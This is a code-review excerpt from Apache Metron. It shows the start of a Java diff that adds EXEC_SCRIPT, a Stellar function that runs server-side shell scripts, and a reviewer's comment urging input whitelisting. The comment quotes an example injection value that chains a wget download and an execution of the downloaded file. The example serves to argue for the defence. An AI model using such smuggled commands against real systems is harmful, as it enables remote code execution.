metron-platform/metron-common/src/main/java/org/apache/metron/common/dsl/ExternalFunctions.java

```diff
@@ -0,0 +1,292 @@
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.apache.metron.common.dsl.functions;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.io.PrintWriter;
+import java.util.List;
+import java.lang.ProcessBuilder;
+import java.lang.ClassLoader;
+import java.lang.reflect.Method;
+import java.util.Map;
+import java.util.regex.Pattern;
+import com.google.common.base.Joiner;
+import com.google.common.base.Splitter;
+import com.google.common.collect.Iterables;
+import org.apache.metron.common.dsl.Context;
+import org.apache.metron.common.dsl.StellarFunction;
+import org.apache.metron.common.dsl.ParseException;
+import org.apache.metron.common.dsl.Stellar;
+
+/**
+ * Executes external script on server via stellar process
+ */
+public class ExternalFunctions {
+
+	public static class ExecuteScript implements StellarFunction {
+
+        private ThreadedStreamHandler inStream;
+        private ThreadedStreamHandler errStream;
+        private boolean isOnTheList = false;
+
+        @Stellar(name="EXEC_SCRIPT",
+                description = "Executes an external shell function via stellar.",
+                params = {
+                        "exec - the executing cmd (ie. bash, sh, python)",
+                        "name - name of the script, located in /scripts " +
+                                "Do NOT include any special chars except(_), Do include file extension"
+                },
+                returns = "the return value of the function"
+        )
+
+	    @Override
+        public Object apply(List<Object> args, Context context) throws ParseException {
+            String exec = "";
+            String name = "";
+            String path = "";
+
+            // if args are provided, get args, only if in whitelist
+            if (args.size() >= 1) {
+                Object execObj = args.get(0);
+                if (!(execObj instanceof String)) { //check if string
+                    return null;
+                }
+                else if (((String) execObj).length() > 0) {
+                    exec = (String) execObj;
+                }
+                else {
+                    return null;
+                }
+
+                Object nameObj = args.get(1);
+                if (!(nameObj instanceof String)) { //check if string
+                    return null;
+                }
+                else if (((String) nameObj).length() > 0) {
+                    name = (String) nameObj;
+                }
+                else {
+                    return null;
+                }
+
+                if (!Pattern.matches("[0-9A-Za-z.]+", name)) {
+                    return null; //if not on whitelist
+                }
```

Comment:
This was in response to a comment that I made where I requested we sanitize our inputs by whitelisting reasonable characters.  Because a user may want to pass arbitrary information from/about the tuple, such as a URI, as an argument to a script I want to avoid an attacker choosing to go to a URI that could be interpreted as `somethinghere&&wget badness&&/execute/badness#ignore everything else`.  Not a perfect example, but it shows the idea.

Once the JIRA is back up I posted links to a few best practice suggestions with code examples that show exactly what I was thinking.

I totally agree that there needs to be strong controls around the directory where any scripts are held, and we need to be sure to run the script with minimal permissions, among other things.